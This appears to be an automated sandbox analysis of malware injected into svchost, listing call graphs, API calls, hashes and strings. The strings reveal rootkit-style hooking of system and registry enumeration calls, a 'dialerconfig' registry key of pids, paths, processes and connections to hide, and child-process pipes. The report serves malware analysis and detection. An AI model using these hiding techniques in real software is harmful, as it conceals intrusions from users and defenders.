_CreateFrameInfo 4 API calls 8761->8762 8763 23d07489739 __vcrt_uninitialize_ptd 8761->8763 8762->8763 8763->8752 8765 23d074897ef 8764->8765 8766 23d074897d2 DeleteCriticalSection 8765->8766 8767 23d074897f3 8765->8767 8766->8765 8767->8750 8769 23d07489dc4 __vcrt_InitializeCriticalSectionEx 3 API calls 8768->8769 8770 23d0748a076 8769->8770 8771 23d0748a08b InitializeCriticalSectionAndSpinCount 8770->8771 8772 23d0748a080 8770->8772 8771->8772 8772->8755 9040 23d074828c8 9042 23d0748290e 9040->9042 9041 23d07482970 9042->9041 9043 23d07483844 StrCmpNIW 9042->9043 9043->9042 8173 23d0748c5cc 8174 23d0748d744 __free_lconv_mon 5 API calls 8173->8174 8175 23d0748c5dc 8174->8175 8176 23d0748d744 __free_lconv_mon 5 API calls 8175->8176 8177 23d0748c5f0 8176->8177 8178 23d0748d744 __free_lconv_mon 5 API calls 8177->8178 8179 23d0748c604 8178->8179 8180 23d0748d744 __free_lconv_mon 5 API calls 8179->8180 8181 23d0748c618 8180->8181 8773 23d0748fc40 8774 23d0748fc70 8773->8774 8781 23d0748fc97 8773->8781 8775 23d0748cfa0 __free_lconv_mon 5 API calls 8774->8775 8777 23d0748fc84 8774->8777 8774->8781 8775->8777 8776 23d0748fcd4 8777->8776 8778 23d0748fd19 8777->8778 8777->8781 8779 23d0748d6ac __free_lconv_mon 5 API calls 8778->8779 8780 23d0748fd1e 8779->8780 8783 23d0748d570 _invalid_parameter_noinfo 18 API calls 8780->8783 8782 23d0748fea0 8781->8782 8784 23d0748ce28 _invalid_parameter_noinfo 15 API calls 8781->8784 8787 23d0748fdd3 8781->8787 8783->8776 8786 23d0748fdc3 8784->8786 8785 23d0748ce28 15 API calls _invalid_parameter_noinfo 8785->8787 8788 23d0748ce28 _invalid_parameter_noinfo 15 API calls 8786->8788 8787->8785 8788->8787 8789 23d07491040 8790 23d0749105f 8789->8790 8791 23d074910d8 8790->8791 8794 23d0749106f 8790->8794 8797 23d07488200 8791->8797 8795 23d07487940 _log10_special 4 API calls 8794->8795 8796 23d074910ce 8795->8796 8800 23d07488214 IsProcessorFeaturePresent 8797->8800 8799 23d0748820e 8801 23d0748822b 8800->8801 8804 23d074882b0 RtlCaptureContext RtlLookupFunctionEntry 8801->8804 8803 23d0748823f 8803->8799 8805 23d074882e0 RtlVirtualUnwind 8804->8805 8806 23d07488312 8804->8806 8805->8806 8806->8803 9660 23d07490b40 9661 23d07490b6d 9660->9661 9662 23d0748d6ac __free_lconv_mon 5 API calls 9661->9662 9667 23d07490b82 9661->9667 9663 23d07490b77 9662->9663 9664 23d0748d570 _invalid_parameter_noinfo 18 API calls 9663->9664 9664->9667 9665 23d07487940 _log10_special 4 API calls 9666 23d07490f40 9665->9666 9667->9665 9044 23d07491ac1 9045 23d0748d6ac __free_lconv_mon 5 API calls 9044->9045 9046 23d07491ac6 9045->9046 9047 23d0748d570 _invalid_parameter_noinfo 18 API calls 9046->9047 9048 23d07491ad1 9047->9048 8807 23d07482244 GetProcessIdOfThread GetCurrentProcessId 8808 23d07482275 8807->8808 8809 23d07482312 8807->8809 8814 23d07481934 OpenProcess 8808->8814 8812 23d07482287 CreateFileW 8812->8809 8813 23d074822cb WriteFile ReadFile CloseHandle 8812->8813 8813->8809 8815 23d07481989 8814->8815 8816 23d07481960 IsWow64Process 8814->8816 8815->8809 8815->8812 8817 23d07481980 CloseHandle 8816->8817 8818 23d07481972 8816->8818 8817->8815 8818->8817 9668 23d07487f56 9669 23d074893e8 __std_exception_copy 18 API calls 9668->9669 9670 23d07487f81 9669->9670 8182 23d07494dd8 8185 23d0748b200 8182->8185 8186 23d0748b21f 8185->8186 8188 23d0748b270 8185->8188 8187 23d07489634 _CreateFrameInfo 4 API calls 8186->8187 8186->8188 8187->8188 9049 23d07487adc 9056 23d0748925c 9049->9056 9052 23d07487ae9 9057 23d07489650 _CreateFrameInfo 4 API calls 9056->9057 9058 23d07487ae5 9057->9058 9058->9052 9059 23d0748c63c 9058->9059 9060 23d0748cfa0 __free_lconv_mon 5 API calls 9059->9060 9061 23d07487af2 9060->9061 9061->9052 9062 23d07489270 9061->9062 9065 23d074895ec 9062->9065 9064 23d07489279 9064->9052 9066 23d074895fd 9065->9066 9068 23d07489612 __vcrt_freefls 9065->9068 9067 23d07489fec _CreateFrameInfo 4 API calls 9066->9067 9067->9068 9068->9064 9671 23d0748554d 9673 23d07485554 9671->9673 9672 23d074855bb 9673->9672 9674 23d07485637 VirtualProtect 9673->9674 9675 23d07485671 9674->9675 9676 23d07485663 GetLastError 9674->9676 9676->9675 8819 23d0748fa50 8820 23d0748fa60 8819->8820 8827 23d07491d0c 8820->8827 8822 23d0748fa69 8826 23d0748fa77 8822->8826 8835 23d0748f858 GetStartupInfoW 8822->8835 8828 23d07491d2b 8827->8828 8832 23d07491d54 8827->8832 8829 23d0748d6ac __free_lconv_mon 5 API calls 8828->8829 8830 23d07491d30 8829->8830 8831 23d0748d570 _invalid_parameter_noinfo 18 API calls 8830->8831 8834 23d07491d3c 8831->8834 8832->8834 8846 23d07491c14 8832->8846 8834->8822 8836 23d0748f927 8835->8836 8837 23d0748f88d 8835->8837 8841 23d0748f948 8836->8841 8837->8836 8838 23d07491d0c 22 API calls 8837->8838 8839 23d0748f8b6 8838->8839 8839->8836 8840 23d0748f8e0 GetFileType 8839->8840 8840->8839 8842 23d0748f966 8841->8842 8843 23d0748f9c1 GetStdHandle 8842->8843 8844 23d0748fa35 8842->8844 8843->8842 8845 23d0748f9d4 GetFileType 8843->8845 8844->8826 8845->8842 8847 23d0748d6cc __free_lconv_mon 5 API calls 8846->8847 8852 23d07491c35 8847->8852 8848 23d07491c97 8849 23d0748d744 __free_lconv_mon 5 API calls 8848->8849 8850 23d07491ca1 8849->8850 8850->8832 8851 23d0748f60c 4 API calls 8851->8852 8852->8848 8852->8851 8853 23d07494c51 __scrt_dllmain_exception_filter 8854 23d0748f054 GetCommandLineA GetCommandLineW 9677 23d0748c954 9678 23d0748c95c 9677->9678 9679 23d0748f60c 4 API calls 9678->9679 9680 23d0748c98d 9678->9680 9681 23d0748c989 9678->9681 9679->9678 9683 23d0748c9b8 9680->9683 9684 23d0748c9e3 9683->9684 9685 23d0748c9c6 DeleteCriticalSection 9684->9685 9686 23d0748c9e7 9684->9686 9685->9684 9686->9681

                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                            Function 0000023D0748328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1683269324-0
                                                                                                                                                                                            • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                                                                                            • Instruction ID: 249fe295386c2627b77399d12c07c604ae3671114177613492f91ae15b0296f6
                                                                                                                                                                                            • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                                                                                            • Instruction Fuzzy Hash: D9115731A1464892FBACAF31F84D3ED2294FB94F45F504129E9D68D991EFBCC3488200
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D07481ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0000023D07481628: GetProcessHeap.KERNEL32 ref: 0000023D07481633
                                                                                                                                                                                              • Part of subcall function 0000023D07481628: HeapAlloc.KERNEL32 ref: 0000023D07481642
                                                                                                                                                                                              • Part of subcall function 0000023D07481628: RegOpenKeyExW.ADVAPI32 ref: 0000023D074816B2
                                                                                                                                                                                              • Part of subcall function 0000023D07481628: RegOpenKeyExW.ADVAPI32 ref: 0000023D074816DF
                                                                                                                                                                                              • Part of subcall function 0000023D07481628: RegCloseKey.ADVAPI32 ref: 0000023D074816F9
                                                                                                                                                                                              • Part of subcall function 0000023D07481628: RegOpenKeyExW.ADVAPI32 ref: 0000023D07481719
                                                                                                                                                                                              • Part of subcall function 0000023D07481628: RegCloseKey.ADVAPI32 ref: 0000023D07481734
                                                                                                                                                                                              • Part of subcall function 0000023D07481628: RegOpenKeyExW.ADVAPI32 ref: 0000023D07481754
                                                                                                                                                                                              • Part of subcall function 0000023D07481628: RegCloseKey.ADVAPI32 ref: 0000023D0748176F
                                                                                                                                                                                              • Part of subcall function 0000023D07481628: RegOpenKeyExW.ADVAPI32 ref: 0000023D0748178F
                                                                                                                                                                                              • Part of subcall function 0000023D07481628: RegCloseKey.ADVAPI32 ref: 0000023D074817AA
                                                                                                                                                                                              • Part of subcall function 0000023D07481628: RegOpenKeyExW.ADVAPI32 ref: 0000023D074817CA
                                                                                                                                                                                            • Sleep.KERNEL32 ref: 0000023D07481AD7
                                                                                                                                                                                            • SleepEx.KERNEL32 ref: 0000023D07481ADD
                                                                                                                                                                                              • Part of subcall function 0000023D07481628: RegCloseKey.ADVAPI32 ref: 0000023D074817E5
                                                                                                                                                                                              • Part of subcall function 0000023D07481628: RegOpenKeyExW.ADVAPI32 ref: 0000023D07481805
                                                                                                                                                                                              • Part of subcall function 0000023D07481628: RegCloseKey.ADVAPI32 ref: 0000023D07481820
                                                                                                                                                                                              • Part of subcall function 0000023D07481628: RegOpenKeyExW.ADVAPI32 ref: 0000023D07481840
                                                                                                                                                                                              • Part of subcall function 0000023D07481628: RegCloseKey.ADVAPI32 ref: 0000023D0748185B
                                                                                                                                                                                              • Part of subcall function 0000023D07481628: RegOpenKeyExW.ADVAPI32 ref: 0000023D0748187B
                                                                                                                                                                                              • Part of subcall function 0000023D07481628: RegCloseKey.ADVAPI32 ref: 0000023D07481896
                                                                                                                                                                                              • Part of subcall function 0000023D07481628: RegCloseKey.ADVAPI32 ref: 0000023D074818A0
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1534210851-0
                                                                                                                                                                                            • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                                                                                            • Instruction ID: 847e6377e3dc575efd689e333a6c8c4ddf9d9a476f20b54236c2633c8c4932e5
                                                                                                                                                                                            • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6831FD6121164D92EBD99B36FA493FD53A5EB84FD0F04542BCE898F396FF28C6528210
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                            Function 0000023D07482B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 209 23d07482b2c-23d07482ba5 call 23d074a2ce0 212 23d07482bab-23d07482bb1 209->212 213 23d07482ee0-23d07482f03 209->213 212->213 214 23d07482bb7-23d07482bba 212->214 214->213 215 23d07482bc0-23d07482bc3 214->215 215->213 216 23d07482bc9-23d07482bd9 GetModuleHandleA 215->216 217 23d07482bdb-23d07482beb call 23d07496090 216->217 218 23d07482bed 216->218 219 23d07482bf0-23d07482c0e 217->219 218->219 219->213 223 23d07482c14-23d07482c33 StrCmpNIW 219->223 223->213 224 23d07482c39-23d07482c3d 223->224 224->213 225 23d07482c43-23d07482c4d 224->225 225->213 226 23d07482c53-23d07482c5a 225->226 226->213 227 23d07482c60-23d07482c73 226->227 228 23d07482c75-23d07482c81 227->228 229 23d07482c83 227->229 230 23d07482c86-23d07482c8a 228->230 229->230 231 23d07482c9a 230->231 232 23d07482c8c-23d07482c98 230->232 233 23d07482c9d-23d07482ca7 231->233 232->233 234 23d07482d9d-23d07482da1 233->234 235 23d07482cad-23d07482cb0 233->235 236 23d07482da7-23d07482daa 234->236 237 23d07482ed2-23d07482eda 234->237 238 23d07482cc2-23d07482ccc 235->238 239 23d07482cb2-23d07482cbf call 23d0748199c 235->239 243 23d07482dbb-23d07482dc5 236->243 244 23d07482dac-23d07482db8 call 23d0748199c 236->244 237->213 237->227 241 23d07482cce-23d07482cdb 238->241 242 23d07482d00-23d07482d0a 238->242 239->238 241->242 246 23d07482cdd-23d07482cea 241->246 247 23d07482d3a-23d07482d3d 242->247 248 23d07482d0c-23d07482d19 242->248 250 23d07482df5-23d07482df8 243->250 251 23d07482dc7-23d07482dd4 243->251 244->243 255 23d07482ced-23d07482cf3 246->255 257 23d07482d4b-23d07482d58 lstrlenW 247->257 258 23d07482d3f-23d07482d49 call 23d07481bbc 247->258 248->247 256 23d07482d1b-23d07482d28 248->256 253 23d07482e05-23d07482e12 lstrlenW 250->253 254 23d07482dfa-23d07482e03 call 23d07481bbc 250->254 251->250 252 23d07482dd6-23d07482de3 251->252 260 23d07482de6-23d07482dec 252->260 266 23d07482e35-23d07482e3f call 23d07483844 253->266 267 23d07482e14-23d07482e1e 253->267 254->253 270 23d07482e4a-23d07482e55 254->270 264 23d07482cf9-23d07482cfe 255->264 265 23d07482d93-23d07482d98 255->265 268 23d07482d2b-23d07482d31 256->268 261 23d07482d5a-23d07482d64 257->261 262 23d07482d7b-23d07482d8d call 23d07483844 257->262 258->257 258->265 260->270 271 23d07482dee-23d07482df3 260->271 261->262 272 23d07482d66-23d07482d79 call 23d0748152c 261->272 262->265 275 23d07482e42-23d07482e44 262->275 264->242 264->255 265->275 266->275 267->266 276 23d07482e20-23d07482e33 call 23d0748152c 267->276 268->265 277 23d07482d33-23d07482d38 268->277 280 23d07482e57-23d07482e5b 270->280 281 23d07482ecc-23d07482ed0 270->281 271->250 271->260 272->262 272->265 275->237 275->270 276->266 276->270 277->247 277->268 286 23d07482e5d-23d07482e61 280->286 287 23d07482e63-23d07482e7d call 23d074885c0 280->287 281->237 286->287 290 23d07482e80-23d07482e83 286->290 287->290 293 23d07482e85-23d07482ea3 call 23d074885c0 290->293 294 23d07482ea6-23d07482ea9 290->294 293->294 294->281 296 23d07482eab-23d07482ec9 call 23d074885c0 294->296 296->281
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                                                                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                                                                                            • API String ID: 2119608203-3850299575
                                                                                                                                                                                            • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                                                                                            • Instruction ID: 568704c4c03e7105a6dbd2c871c9419f6adb55d7556ff538f8b158f5da99337c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                                                                                            • Instruction Fuzzy Hash: B2B17A76210A9886EBED8F35E4487ED63E5FB44F84F445016EE895BB94DBB8CE80C740
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D07487D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                                                            • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                                                                                            • Instruction ID: 5ef50bba8b6294292f23dfc326b6b549d4ebdc4a8f468fd140640293cd9c38dd
                                                                                                                                                                                            • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B312F72215B848AEBA49FB0F8947ED7364F784B44F44442ADA8D5BB98EF7CC648C710
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D0748D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                                                            • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                                                                                            • Instruction ID: 30ab572208139a833cd1e4f2db5cdedbeff19a75742dd5cbac50be8af946606d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                                                                                            • Instruction Fuzzy Hash: 88315B32614B8486EB64CF75E8843EE73A4F789B94F500126EA9D4BB98DF3CC245CB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D07481628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                                                                                            • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                                                                            • API String ID: 106492572-2879589442
                                                                                                                                                                                            • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                                                                                            • Instruction ID: 555f11e2c5d7e5d602705ee85cc5484c87cf9b83bf79107f966d7841e8cb89e6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F711526710A18C6EB549F76F88869D33A4FB88F8CF011126DE8E5BB29DF78C655C740
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D074812BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                                                                            • String ID: d
                                                                                                                                                                                            • API String ID: 2005889112-2564639436
                                                                                                                                                                                            • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                                                                                            • Instruction ID: d757895e1044013e3484bb0b51aff29d47f7e5e8bfa9b23e59cd153eb00cc443
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F513A36200B88C6EB58CF62F44939A77A1F788FC9F054125DA8A0B728EF7CC6458B00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D07481D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                                                                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                                                                                                            • API String ID: 4175298099-1975688563
                                                                                                                                                                                            • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                                                                                            • Instruction ID: 3dc062d91e024b63eda59a538b6bc41622ff02a2413009beb4566624e7ff408a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B317264A00A4EB0EA8DEF79F8596E87320FB44F44F805017DAD91E5669FBCC34AD790
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D0748CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0000023D0748CE37
                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,0000023D07490A6B,?,?,?,0000023D0749045C,?,?,?,0000023D0748C84F), ref: 0000023D0748CE4C
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000023D07490A6B,?,?,?,0000023D0749045C,?,?,?,0000023D0748C84F), ref: 0000023D0748CE6D
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000023D07490A6B,?,?,?,0000023D0749045C,?,?,?,0000023D0748C84F), ref: 0000023D0748CE9A
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000023D07490A6B,?,?,?,0000023D0749045C,?,?,?,0000023D0748C84F), ref: 0000023D0748CEAB
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000023D07490A6B,?,?,?,0000023D0749045C,?,?,?,0000023D0748C84F), ref: 0000023D0748CEBC
                                                                                                                                                                                            • SetLastError.KERNEL32 ref: 0000023D0748CED7
                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000023D07490A6B,?,?,?,0000023D0749045C,?,?,?,0000023D0748C84F), ref: 0000023D0748CF0D
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,00000001,0000023D0748ECCC,?,?,?,?,0000023D0748BF9F,?,?,?,?,?,0000023D07487AB0), ref: 0000023D0748CF2C
                                                                                                                                                                                              • Part of subcall function 0000023D0748D6CC: HeapAlloc.KERNEL32 ref: 0000023D0748D721
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000023D07490A6B,?,?,?,0000023D0749045C,?,?,?,0000023D0748C84F), ref: 0000023D0748CF54
                                                                                                                                                                                              • Part of subcall function 0000023D0748D744: HeapFree.KERNEL32 ref: 0000023D0748D75A
                                                                                                                                                                                              • Part of subcall function 0000023D0748D744: GetLastError.KERNEL32 ref: 0000023D0748D764
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000023D07490A6B,?,?,?,0000023D0749045C,?,?,?,0000023D0748C84F), ref: 0000023D0748CF65
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000023D07490A6B,?,?,?,0000023D0749045C,?,?,?,0000023D0748C84F), ref: 0000023D0748CF76
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 570795689-0
                                                                                                                                                                                            • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                                                                                            • Instruction ID: 37e689e573dddeafb8ea026c3800c64344d22b417951650d2666f654e9515631
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A41802070124C81FAEDA735759D3FD2292DF84FB0F240764E9B65EAE6DE6CC7019620
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D07482244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                                                                                            • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                                                                                                            • API String ID: 2171963597-1373409510
                                                                                                                                                                                            • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                                                                                            • Instruction ID: 967e0752b4b09135bc43116ca6260b41a95f99fb7a4056cabc477c3fdf007d2c
                                                                                                                                                                                            • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B214C32614B44C3FB58CB35F45836A73A1F789BA4F500215EA990BBA8DFBCC249CB01
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

